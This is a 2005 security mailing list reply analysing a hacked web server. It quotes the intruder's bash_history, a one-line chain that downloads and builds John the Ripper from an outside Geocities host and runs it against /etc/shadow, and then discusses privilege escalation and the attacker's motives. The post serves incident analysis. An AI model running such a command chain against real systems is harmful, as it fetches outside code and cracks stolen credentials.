Re: SSH compiled with backdoor
From: Javier Fernandez-Sanguino (jfernandez_at_germinus.com)
Date: Tue, 30 Aug 2005 12:43:31 +0200 To: firstname.lastname@example.org
> One of my web servers was hacked on July 17, 2005. bash_history
> w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
> john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
> linux-x86-any-elf;cd ../run;./john /etc/shadow
> According to john, a couple of users had weak passwords, but root
> seemed well protected. From looking in all the bash_history, it
> appears the hacker came in from the website account, and did an su
> from there.
He might have escalated privileges to root from the website account
using a kernel root exploit. You did not mention whose bash_history
you provided but from the above john run is evident that he is already
running as root (as he is able to read /etc/shadow).
I wonder why he cracked those passwords if he already had root access.
Maybe he wanted to use them to propagate the attack to nearby systems
or to feed the vulnerable passwords to his personal password file.
BTW, 'securedro' seems to have been removed from Geocities, but not
'cretu_2004' (where the john sources are). The john sources downloaded
from there, though, seem to be the same as downloaded from Openwall. I
expected them to have "improved" the run/password.lst and add common
(for them) passwords there.